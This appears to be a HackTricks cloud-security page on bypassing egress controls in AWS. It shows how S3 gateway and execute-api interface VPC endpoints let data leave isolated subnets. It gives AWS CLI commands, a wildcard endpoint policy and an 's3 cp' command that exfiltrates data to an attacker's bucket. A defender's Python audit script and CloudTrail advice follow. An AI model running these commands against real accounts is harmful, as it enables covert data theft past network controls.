AWS – Egress Bypass from Isolated Subnets via VPC Endpoints

{{#include ../../../../banners/hacktricks-training.md}}

Summary

This technique abuses VPC Endpoints to create exfiltration channels from subnets that have no Internet Gateway or NAT. Gateway endpoints (e.g., S3) add prefix‑list routes to the subnet route tables; Interface endpoints (e.g., execute-api, secretsmanager, ssm) create reachable ENIs with private IPs, protected only by their security groups. With minimal VPC/EC2 permissions, an attacker can enable controlled egress that never traverses the public Internet.

Prereqs: existing VPC and private subnets (no IGW/NAT). You’ll need permissions to create VPC endpoints and, for Option B, a security group to attach to the endpoint ENIs.

Option A – S3 Gateway VPC Endpoint

Variables
- REGION=us-east-1
- VPC_ID=<target vpc>
- RTB_IDS=<comma-separated route table IDs of private subnets>

1) Create a permissive endpoint policy file (optional). Save as allow-put-get-any-s3.json:

```json
{
  "Version": "2012-10-17",
  "Statement": [ { "Effect": "Allow", "Action": ["s3:*"], "Resource": ["*"] } ]
}
```

2) Create the S3 Gateway endpoint (adds S3 prefix‑list route to the selected route tables):

```bash
aws ec2 create-vpc-endpoint \
  --vpc-id $VPC_ID \
  --service-name com.amazonaws.$REGION.s3 \
  --vpc-endpoint-type Gateway \
  --route-table-ids $RTB_IDS \
  --policy-document file://allow-put-get-any-s3.json   # optional
```

Evidence to capture:
- aws ec2 describe-route-tables --route-table-ids $RTB_IDS shows a route to the AWS S3 prefix list (e.g., DestinationPrefixListId=pl-..., GatewayId=vpce-...).
- From an instance in those subnets (with IAM perms) you can exfil via S3 without Internet:

```bash
# On the isolated instance (e.g., via SSM):
echo data > /tmp/x.txt
aws s3 cp /tmp/x.txt s3://<your-bucket>/egress-test/x.txt --region $REGION
```

Option B – Interface VPC Endpoint for API Gateway (execute-api)

Variables
- REGION=us-east-1
- VPC_ID=<target vpc>
- SUBNET_IDS=<comma-separated private subnets>
- SG_VPCE=<security group for the endpoint ENIs allowing 443 from target instances>

1) Create the interface endpoint and attach the SG:

```bash
aws ec2 create-vpc-endpoint \
  --vpc-id $VPC_ID \
  --service-name com.amazonaws.$REGION.execute-api \
  --vpc-endpoint-type Interface \
  --subnet-ids $SUBNET_IDS \
  --security-group-ids $SG_VPCE \
  --private-dns-enabled
```

Evidence to capture:
- aws ec2 describe-vpc-endpoints shows the endpoint in available state with NetworkInterfaceIds (ENIs in your subnets).
- Instances in those subnets can reach Private API Gateway endpoints through those VPCE ENIs (no Internet path required).

Impact

- Bypasses perimeter egress controls by leveraging AWS‑managed private paths to AWS services.
- Enables data exfiltration from isolated subnets (e.g., writing to S3, calling Private API Gateway, reaching Secrets Manager/SSM/STS) without IGW/NAT.
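Defender-side check, added here as an example (not HackTricks' own code): it walks the JSON that `aws ec2 describe-vpc-endpoints` and `aws ec2 describe-route-tables` return and flags the artefacts Options A and B leave behind in the same VPC: a gateway endpoint whose prefix-list route landed in a private route table, an interface endpoint with ENIs in private subnets and private DNS enabled, and a wildcard endpoint policy like the one above. The sample records and all IDs (`vpce-0aaa`, `rtb-0priv`, `pl-0example`, ...) are constructed; field names follow the AWS CLI output.

```python
import json

# Constructed records shaped like the AWS CLI output (only the fields this check reads).
SAMPLE_ENDPOINTS = [
    {"VpcEndpointId": "vpce-0aaa", "VpcEndpointType": "Gateway", "State": "available",
     "ServiceName": "com.amazonaws.us-east-1.s3", "RouteTableIds": ["rtb-0priv"],
     "PolicyDocument": json.dumps({"Version": "2012-10-17", "Statement": [
         {"Effect": "Allow", "Action": ["s3:*"], "Resource": ["*"]}]})},
    {"VpcEndpointId": "vpce-0bbb", "VpcEndpointType": "Interface", "State": "available",
     "ServiceName": "com.amazonaws.us-east-1.execute-api", "SubnetIds": ["subnet-0priv"],
     "NetworkInterfaceIds": ["eni-0ccc"], "PrivateDnsEnabled": True},
]
SAMPLE_ROUTE_TABLES = [{"RouteTableId": "rtb-0priv", "Routes": [
    {"DestinationCidrBlock": "10.0.0.0/16", "GatewayId": "local"},
    {"DestinationPrefixListId": "pl-0example", "GatewayId": "vpce-0aaa"}]}]

def policy_is_wildcard(policy):
    """True if an Allow statement grants '*' or 'service:*' actions on Resource '*'."""
    doc = json.loads(policy) if isinstance(policy, str) else policy
    as_list = lambda v: [v] if isinstance(v, (str, dict)) else list(v)
    for s in as_list(doc.get("Statement", [])):  # Statement may be a dict or a list
        acts, res = as_list(s.get("Action", [])), as_list(s.get("Resource", []))
        wild = any(a == "*" or a.endswith(":*") for a in acts)
        if s.get("Effect") == "Allow" and wild and "*" in res:
            return True
    return False

def audit_vpc_endpoints(endpoints, route_tables):
    """Return one finding per endpoint that opens a private path out of the VPC."""
    routes_of = {r["RouteTableId"]: r.get("Routes", []) for r in route_tables}
    findings = []
    for ep in endpoints:
        reasons = []
        if ep.get("PolicyDocument") and policy_is_wildcard(ep["PolicyDocument"]):
            reasons.append("wildcard endpoint policy")
        if ep["VpcEndpointType"] == "Gateway":
            # Option A leaves a prefix-list route targeting the vpce- in each attached route table
            for rtb_id in ep.get("RouteTableIds", []):
                if any(r.get("GatewayId") == ep["VpcEndpointId"] and "DestinationPrefixListId" in r
                       for r in routes_of.get(rtb_id, [])):
                    reasons.append(f"prefix-list route in {rtb_id}")
        else:
            # Option B leaves ENIs in the chosen subnets; private DNS points the service name at them
            reasons.append("ENIs in " + ",".join(ep.get("SubnetIds", [])))
            if ep.get("PrivateDnsEnabled"):
                reasons.append("private DNS enabled")
        if reasons:
            findings.append({"VpcEndpointId": ep["VpcEndpointId"], "ServiceName": ep["ServiceName"], "Reasons": reasons})
    return findings
```

Pair the inventory with a CloudTrail alert on the `CreateVpcEndpoint` and `ModifyVpcEndpoint` EC2 API calls so new endpoints in isolated VPCs are reviewed as they appear, and compare each finding against the list of endpoints the VPC is supposed to have.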

{{#include ../../../../banners/hacktricks-training.md}}